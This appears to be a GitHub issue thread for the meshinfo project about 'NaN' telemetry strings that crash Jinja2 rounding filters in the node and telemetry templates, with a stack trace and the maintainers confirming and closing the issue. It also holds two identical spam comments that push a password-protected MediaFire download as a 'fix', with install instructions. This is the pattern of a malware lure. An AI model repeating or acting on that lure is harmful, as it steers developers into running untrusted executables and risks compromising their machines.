### ISSUE TITLE
NaN values in telemetry

### ISSUE THREAD

**Issue by quimnut** [MeshAddicts/meshinfo#82]
A new node had some invalid telemetry today on .328

meshinfo_1  |     |   File "templates/static/node.html.j2", line 43, in block 'content'
meshinfo_1  |     |     {{ node.telemetry.temperature | round(1) }}&deg;C
meshinfo_1  |     | ^^^^^^^^^^^^^^^^^
meshinfo_1  |     |   File "/usr/local/lib/python3.12/site-packages/jinja2/filters.py", line 1169, in do_round
meshinfo_1  |     |     return round(value, precision)
meshinfo_1  |     |            ^^^^^^^^^^^^^^^^^^^^^^^
meshinfo_1  |     | TypeError: type str doesn't define __round__ method

nodes.json had;

    "telemetry": {
      "relative_humidity": "NaN",
      "temperature": "NaN"
    }

It also ended up in telenetry.json

meshinfo_1  |     |   File "templates/static/telemetry.html.j2", line 173, in block 'content'
meshinfo_1  |     |     {{ item.payload.temperature | round(2) }} &deg;C

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by kevinelliott** [comment]
@quimnut Good report. Yes, confirmed, I'm seeing these too.

**Comment by kevinelliott** [comment]
@quimnut Do you want to take a stab at this one?

**Comment by kevinelliott** [comment]
Completed.
